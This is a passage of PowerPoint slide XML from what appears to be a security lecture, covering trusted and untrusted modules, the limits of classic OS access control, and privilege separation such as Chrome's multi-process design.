                    <a:tab pos="7239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defTabSz="492125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="11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tabLst>
                    <a:tab pos="7239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defTabSz="492125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="11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tabLst>
                    <a:tab pos="7239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defTabSz="492125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="11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tabLst>
                    <a:tab pos="7239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defTabSz="492125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="11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tabLst>
                    <a:tab pos="7239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>
                  <a:spcAft>
                    <a:spcPct val="0"/>
                  </a:spcAft>
                  <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="nl-NL" b="1"/>
                  <a:t>trusted   module A  </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="nl-NL" sz="2400"/>
                  <a:t>                  </a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="nl-NL"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25629" name="AutoShape 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E9D931A-8A0E-1BB8-CB34-55B174AED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0786" y="2136763"/>
                <a:ext cx="1677478" cy="1000125"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 120"/>
                </a:avLst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0000" tIns="45000" rIns="90000" bIns="45000" anchor="ctr" anchorCtr="1"/>
              <a:lstStyle>
                <a:lvl1pPr>
                  <a:lnSpc>
                    <a:spcPct val="116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tabLst>
                    <a:tab pos="723900" algn="l"/>
                    <a:tab pos="14478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1pPr>
                <a:lvl2pPr>
                  <a:lnSpc>
                    <a:spcPct val="116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tabLst>
                    <a:tab pos="723900" algn="l"/>
                    <a:tab pos="14478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2pPr>
                <a:lvl3pPr>
                  <a:lnSpc>
                    <a:spcPct val="116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tabLst>
                    <a:tab pos="723900" algn="l"/>
                    <a:tab pos="14478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3pPr>
                <a:lvl4pPr>
                  <a:lnSpc>
                    <a:spcPct val="116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tabLst>
                    <a:tab pos="723900" algn="l"/>
                    <a:tab pos="14478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4pPr>
                <a:lvl5pPr>
                  <a:lnSpc>
                    <a:spcPct val="116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tabLst>
                    <a:tab pos="723900" algn="l"/>
                    <a:tab pos="14478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defTabSz="492125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="11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tabLst>
                    <a:tab pos="723900" algn="l"/>
                    <a:tab pos="14478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defTabSz="492125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="11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tabLst>
                    <a:tab pos="723900" algn="l"/>
                    <a:tab pos="14478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defTabSz="492125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="11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tabLst>
                    <a:tab pos="723900" algn="l"/>
                    <a:tab pos="14478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defTabSz="492125" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="11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tabLst>
                    <a:tab pos="723900" algn="l"/>
                    <a:tab pos="1447800" algn="l"/>
                  </a:tabLst>
                  <a:defRPr sz="2000">
                    <a:solidFill>
                      <a:srgbClr val="000000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eaLnBrk="1">
                  <a:spcAft>
                    <a:spcPct val="0"/>
                  </a:spcAft>
                  <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="nl-NL" b="1">
                    <a:solidFill>
                      <a:srgbClr val="FFC000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>untrusted</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="1">
                  <a:spcAft>
                    <a:spcPct val="0"/>
                  </a:spcAft>
                  <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="nl-NL" b="1">
                    <a:solidFill>
                      <a:srgbClr val="FFC000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>module B</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="25630" name="Picture 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA3A8167-9389-44F7-519C-E2DF7473D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4428" y="1851011"/>
                <a:ext cx="666312" cy="714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5631" name="Picture 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E790B1FC-94E5-9E59-4B9B-D0FD64CB18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3381" y="1851011"/>
                <a:ext cx="660911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5605" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BE13DD0-E0E6-99CA-7B45-20B5E85D6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2159000"/>
            <a:ext cx="3397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6" name="Freeform 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5D96D34-3604-5136-B966-19B4CC7AAAFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6405563" y="2806700"/>
            <a:ext cx="885825" cy="46038"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 6943"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 298"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 6943"/>
              <a:gd name="T3" fmla="*/ 0 h 298"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
              <a:gd name="T6" fmla="*/ 0 w 6943"/>
              <a:gd name="T7" fmla="*/ 0 h 298"/>
              <a:gd name="T8" fmla="*/ 6943 w 6943"/>
              <a:gd name="T9" fmla="*/ 298 h 2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43" h="298">
                <a:moveTo>
                  <a:pt x="0" y="297"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6942" y="0"/>
                </a:lnTo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7" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFD5CAB2-42CA-84CB-C166-ECE8012CB568}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2643188" y="3727450"/>
            <a:ext cx="442912" cy="1463675"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 1229"/>
              <a:gd name="T1" fmla="*/ 0 h 4065"/>
              <a:gd name="T2" fmla="*/ 0 w 1229"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 4065"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
              <a:gd name="T6" fmla="*/ 0 w 1229"/>
              <a:gd name="T7" fmla="*/ 0 h 4065"/>
              <a:gd name="T8" fmla="*/ 1229 w 1229"/>
              <a:gd name="T9" fmla="*/ 4065 h 40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29" h="4065">
                <a:moveTo>
                  <a:pt x="1228" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="4064"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="accent4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0488" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{250CBF1A-B856-4F6A-DFE6-59224F4F86B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2763838" y="4106863"/>
            <a:ext cx="1858962" cy="990600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 1229"/>
              <a:gd name="T1" fmla="*/ 0 h 4065"/>
              <a:gd name="T2" fmla="*/ 0 w 1229"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 4065"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
              <a:gd name="T6" fmla="*/ 0 w 1229"/>
              <a:gd name="T7" fmla="*/ 0 h 4065"/>
              <a:gd name="T8" fmla="*/ 1229 w 1229"/>
              <a:gd name="T9" fmla="*/ 4065 h 40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29" h="4065">
                <a:moveTo>
                  <a:pt x="1228" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="4064"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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5609" name="Freeform 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C08AD60C-E709-21CC-DE97-725C791A234B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3814763" y="3205163"/>
            <a:ext cx="911225" cy="177800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 6943"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 298"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 6943"/>
              <a:gd name="T3" fmla="*/ 0 h 298"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
              <a:gd name="T6" fmla="*/ 0 w 6943"/>
              <a:gd name="T7" fmla="*/ 0 h 298"/>
              <a:gd name="T8" fmla="*/ 6943 w 6943"/>
              <a:gd name="T9" fmla="*/ 298 h 2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43" h="298">
                <a:moveTo>
                  <a:pt x="0" y="297"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6942" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="5715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5610" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D945220-EE7A-29F3-F68E-673DBAC33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4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5730875" y="5911850"/>
            <a:ext cx="13493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11" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B255E22-8966-FB30-ED00-F60D55CC12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FFF168C-EA34-4662-8728-79BE3AD18D40}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25612" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE5375A1-43B4-FA8C-13FD-41AE616B5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13" y="3994150"/>
            <a:ext cx="434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altLang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFF99"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="3200">
              <a:solidFill>
                <a:srgbClr val="FFFF99"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25613" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19B78B4C-6D37-B3C8-D19E-0047A6ECB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163" y="4002088"/>
            <a:ext cx="434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altLang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFF99"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="3200">
              <a:solidFill>
                <a:srgbClr val="FFFF99"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25614" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776C1591-1CCF-4B5C-1836-3795CA01B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2722563"/>
            <a:ext cx="46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altLang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FFFF99"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="3600">
              <a:solidFill>
                <a:srgbClr val="FFFF99"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25615" name="TextBox 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72B8319F-4904-1C29-C3F3-62B8A47C6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3805238"/>
            <a:ext cx="433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altLang="en-US" sz="320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en-GB" altLang="en-US" sz="32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843DE3C8-E32D-D846-794D-03EA1A8B4EF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2655888" y="5216525"/>
            <a:ext cx="3362325" cy="962025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 1229"/>
              <a:gd name="T1" fmla="*/ 0 h 4065"/>
              <a:gd name="T2" fmla="*/ 0 w 1229"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 4065"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
              <a:gd name="T6" fmla="*/ 0 w 1229"/>
              <a:gd name="T7" fmla="*/ 0 h 4065"/>
              <a:gd name="T8" fmla="*/ 1229 w 1229"/>
              <a:gd name="T9" fmla="*/ 4065 h 40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29" h="4065">
                <a:moveTo>
                  <a:pt x="1228" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="4064"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="accent4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1" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86470940-1E62-B1B4-1F9B-9FF574D83F21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6338888" y="3873500"/>
            <a:ext cx="1409700" cy="2335213"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 1229"/>
              <a:gd name="T1" fmla="*/ 0 h 4065"/>
              <a:gd name="T2" fmla="*/ 0 w 1229"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 4065"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
              <a:gd name="T6" fmla="*/ 0 w 1229"/>
              <a:gd name="T7" fmla="*/ 0 h 4065"/>
              <a:gd name="T8" fmla="*/ 1229 w 1229"/>
              <a:gd name="T9" fmla="*/ 4065 h 40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29" h="4065">
                <a:moveTo>
                  <a:pt x="1228" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="4064"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="accent4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2E8C539E-5722-97D7-7AA8-974AF57C6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Limitation of classic OS access control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383C395-67E9-699B-07D7-E071978D51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0000" tIns="46800" rIns="90000" bIns="46800"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="339725" indent="-339725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Comic Sans MS" panose="030F0702030302020204" pitchFamily="6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nl-NL" dirty="0"/>
              <a:t>A process has a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fixed set of permissions. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t>Usually, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>all permissions of the user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t>who started it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="339725" indent="-339725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Comic Sans MS" panose="030F0702030302020204" pitchFamily="6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nl-NL" dirty="0"/>
              <a:t>Execution with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reduced permission set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t> may be needed temporarily when executing untrusted or less trusted code.                                          For this OS access control may be too coarse.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="339725" indent="-339725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Comic Sans MS" panose="030F0702030302020204" pitchFamily="6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GB" altLang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="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nl-NL" dirty="0"/>
              <a:t>Remedies/improvements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="739775" lvl="1" indent="-339725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Comic Sans MS" panose="030F0702030302020204" pitchFamily="6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nl-NL" dirty="0"/>
              <a:t>Allowing users to drop rights when they start a process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="739775" lvl="1" indent="-339725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Comic Sans MS" panose="030F0702030302020204" pitchFamily="6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nl-NL" dirty="0"/>
              <a:t>Asking user approval for additional permissions at run-time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="739775" lvl="1" indent="-339725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Comic Sans MS" panose="030F0702030302020204" pitchFamily="6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nl-NL" dirty="0"/>
              <a:t>Using different user accounts for different applications,            as Android does</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="739775" lvl="1" indent="-339725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Comic Sans MS" panose="030F0702030302020204" pitchFamily="6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nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Split a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>process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into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>processes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different access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>rights</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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Comic Sans MS" panose="030F0702030302020204" pitchFamily="6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GB" altLang="nl-NL" dirty="0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5EB3E0BD-6B9C-EB3F-78B8-8C9602A11F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3DF499A9-2D26-4034-AFC9-AE3917A2CDEF}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="93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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="140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574CD3B-A35F-0637-63A2-9955BBBD9C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138" y="1116013"/>
            <a:ext cx="8642350" cy="5770562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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="369230" algn="l"/>
                <a:tab pos="493472" algn="l"/>
                <a:tab pos="997444" algn="l"/>
                <a:tab pos="1501415" algn="l"/>
                <a:tab pos="2005387" algn="l"/>
                <a:tab pos="2509358" algn="l"/>
                <a:tab pos="3013330" algn="l"/>
                <a:tab pos="3517302" algn="l"/>
                <a:tab pos="4021273" algn="l"/>
                <a:tab pos="4525245" algn="l"/>
                <a:tab pos="5029216" algn="l"/>
                <a:tab pos="5533188" algn="l"/>
                <a:tab pos="6037159" algn="l"/>
                <a:tab pos="6541131" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7549074" algn="l"/>
                <a:tab pos="8053046" algn="l"/>
                <a:tab pos="8557017" algn="l"/>
                <a:tab pos="9060989" algn="l"/>
                <a:tab pos="9564960" algn="l"/>
                <a:tab pos="10068932" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" dirty="0"/>
              <a:t>Chrome browser process was split into multiple OS processes</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="369230" indent="-369230" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="369230" algn="l"/>
                <a:tab pos="493472" algn="l"/>
                <a:tab pos="997444" algn="l"/>
                <a:tab pos="1501415" algn="l"/>
                <a:tab pos="2005387" algn="l"/>
                <a:tab pos="2509358" algn="l"/>
                <a:tab pos="3013330" algn="l"/>
                <a:tab pos="3517302" algn="l"/>
                <a:tab pos="4021273" algn="l"/>
                <a:tab pos="4525245" algn="l"/>
                <a:tab pos="5029216" algn="l"/>
                <a:tab pos="5533188" algn="l"/>
                <a:tab pos="6037159" algn="l"/>
                <a:tab pos="6541131" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7549074" algn="l"/>
                <a:tab pos="8053046" algn="l"/>
                <a:tab pos="8557017" algn="l"/>
                <a:tab pos="9060989" algn="l"/>
                <a:tab pos="9564960" algn="l"/>
                <a:tab pos="10068932" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="369230" indent="-369230" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="369230" algn="l"/>
                <a:tab pos="493472" algn="l"/>
                <a:tab pos="997444" algn="l"/>
                <a:tab pos="1501415" algn="l"/>
                <a:tab pos="2005387" algn="l"/>
                <a:tab pos="2509358" algn="l"/>
                <a:tab pos="3013330" algn="l"/>
                <a:tab pos="3517302" algn="l"/>
                <a:tab pos="4021273" algn="l"/>
                <a:tab pos="4525245" algn="l"/>
                <a:tab pos="5029216" algn="l"/>
                <a:tab pos="5533188" algn="l"/>
                <a:tab pos="6037159" algn="l"/>
                <a:tab pos="6541131" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7549074" algn="l"/>
                <a:tab pos="8053046" algn="l"/>
                <a:tab pos="8557017" algn="l"/>
                <a:tab pos="9060989" algn="l"/>
                <a:tab pos="9564960" algn="l"/>
                <a:tab pos="10068932" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="369230" indent="-369230" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="369230" algn="l"/>
                <a:tab pos="493472" algn="l"/>
                <a:tab pos="997444" algn="l"/>
                <a:tab pos="1501415" algn="l"/>
                <a:tab pos="2005387" algn="l"/>
                <a:tab pos="2509358" algn="l"/>
                <a:tab pos="3013330" algn="l"/>
                <a:tab pos="3517302" algn="l"/>
                <a:tab pos="4021273" algn="l"/>
                <a:tab pos="4525245" algn="l"/>
                <a:tab pos="5029216" algn="l"/>
                <a:tab pos="5533188" algn="l"/>
                <a:tab pos="6037159" algn="l"/>
                <a:tab pos="6541131" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7549074" algn="l"/>
                <a:tab pos="8053046" algn="l"/>
                <a:tab pos="8557017" algn="l"/>
                <a:tab pos="9060989" algn="l"/>
                <a:tab pos="9564960" algn="l"/>
                <a:tab pos="10068932" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="810205" lvl="1" indent="-369230" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="369230" algn="l"/>
                <a:tab pos="493472" algn="l"/>
                <a:tab pos="997444" algn="l"/>
                <a:tab pos="1501415" algn="l"/>
                <a:tab pos="2005387" algn="l"/>
                <a:tab pos="2509358" algn="l"/>
                <a:tab pos="3013330" algn="l"/>
                <a:tab pos="3517302" algn="l"/>
                <a:tab pos="4021273" algn="l"/>
                <a:tab pos="4525245" algn="l"/>
                <a:tab pos="5029216" algn="l"/>
                <a:tab pos="5533188" algn="l"/>
                <a:tab pos="6037159" algn="l"/>
                <a:tab pos="6541131" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7549074" algn="l"/>
